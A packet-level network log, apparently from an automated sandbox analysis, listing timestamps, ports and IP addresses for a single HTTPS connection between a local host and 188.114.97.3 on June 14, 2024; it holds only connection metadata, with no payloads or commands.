Jun 14, 2024 15:15:06.104192972 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104217052 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.104218960 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104285002 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.104290962 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104413986 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104429007 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104486942 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.104492903 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104504108 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104528904 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104547024 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.104552984 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104573011 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.104599953 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.104751110 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104765892 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104820967 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.104826927 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104854107 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104866028 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.104872942 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104883909 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104906082 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.104931116 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104940891 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.104948044 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104981899 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.105016947 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105034113 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105107069 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105108976 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.105118990 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105135918 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105159998 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.105166912 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105192900 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.105211973 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.105288029 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105303049 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105355978 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.105361938 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105397940 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.105577946 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105595112 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105632067 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.105638027 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105660915 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.105695963 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.105712891 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105730057 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105762959 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.105771065 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105794907 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.105811119 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.105856895 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105870962 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105920076 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.105926037 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.105961084 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.106184006 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.106200933 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.106251001 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.106256962 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.106292009 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.106308937 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.106326103 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.106365919 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.106373072 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.106391907 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.106405020 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.106537104 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.106550932 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.106599092 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.106605053 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.106640100 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.106725931 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.106744051 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.106775999 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.106781960 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.106806040 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.106822014 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.106873989 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.106889009 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.106940031 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.106945992 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.106983900 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.106993914 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.107007980 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.107043028 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.107048035 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.107072115 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.107084036 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.107481003 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.107498884 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.107536077 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.107542038 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.107568979 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.107589006 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.107616901 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.107631922 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.107676029 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.107681990 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.107708931 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.107732058 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.107903004 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.107918024 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.107964993 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.107971907 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.107994080 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.108016014 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.108078003 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.108093977 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.108140945 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.108146906 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.108172894 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.108191967 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.108462095 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.108478069 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.108532906 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.108541012 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.108566046 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.108584881 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.108618975 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.108637094 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.108680010 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.108685970 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.108736992 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.108757973 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.108764887 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.108794928 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.108794928 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.108808041 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.108830929 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.108865023 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.109292984 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.109308958 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.109357119 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.109365940 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.109375954 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.109405041 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.109441042 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.109457016 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.109502077 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.109508991 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.109549999 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.109601974 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.109621048 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.109664917 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.109671116 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.109711885 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.109754086 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.109770060 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.109818935 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.109824896 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.109863997 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.109891891 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.109910965 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.109960079 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.109967947 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110003948 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.110038996 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110057116 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110100985 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.110106945 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110142946 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.110162020 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110178947 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110217094 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.110224962 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110248089 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.110260010 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.110488892 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110506058 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110546112 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.110553026 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110572100 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.110588074 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110594988 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.110603094 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110630035 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110651970 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.110656977 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110707998 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.110707998 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.110743999 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110759020 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110812902 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.110819101 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110863924 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.110863924 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.110907078 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110923052 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.110981941 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.111001968 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.111011028 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.111044884 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.111134052 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.111150026 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.111196995 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.111203909 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.111231089 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.111246109 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.111262083 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.111278057 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.111334085 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.111340046 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.111388922 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.111388922 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.111401081 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.111422062 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.111439943 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.111471891 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.111476898 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.111516953 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.111586094 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.111601114 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.111640930 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.111646891 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.111680031 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.111680031 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.111841917 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.111857891 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.111911058 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.111933947 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.111948013 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.111985922 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.111989021 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.112000942 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.112020016 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.112068892 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.112081051 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.112087965 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.112106085 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.112119913 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.112134933 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.112143040 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.112173080 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.112199068 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.112258911 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.112273932 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.112319946 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.112329006 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.112356901 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.112376928 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.112473011 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.112494946 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.112540960 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.112546921 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.112600088 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.113085985 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.113109112 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.113123894 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.113132000 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.113151073 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.113162994 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.113179922 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.113181114 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.113198996 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.113231897 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.113243103 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.113265991 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.113409996 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.113434076 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.113481998 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.113490105 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.113501072 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.113501072 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.113527060 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.113533020 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.113539934 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.113559008 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.113595009 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.113823891 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.113852978 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.113903999 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.113910913 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.113935947 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.113955975 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.114073038 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.114089966 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.114142895 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.114151955 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.114191055 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.114671946 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.114689112 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.114789963 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.114798069 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.114840984 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.114859104 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.114881039 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.114914894 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.114923954 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.114968061 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.115348101 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.115365982 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.115416050 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.115423918 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.115468025 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.115499020 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.115521908 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.115552902 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.115561008 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.115576982 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.115603924 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.115793943 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.115811110 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.115864038 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.115871906 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.115911961 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.116535902 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.116558075 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.116602898 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.116609097 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.116616964 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.116630077 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.116657972 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.116666079 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.116686106 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.116707087 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.116842985 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.116859913 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.116898060 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.116904020 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.116915941 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.116928101 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.116940022 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.116952896 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.116961002 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.116981983 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.117017031 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.117172956 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.117188931 CEST	443	49707	188.114.97.3	192.168.2.8
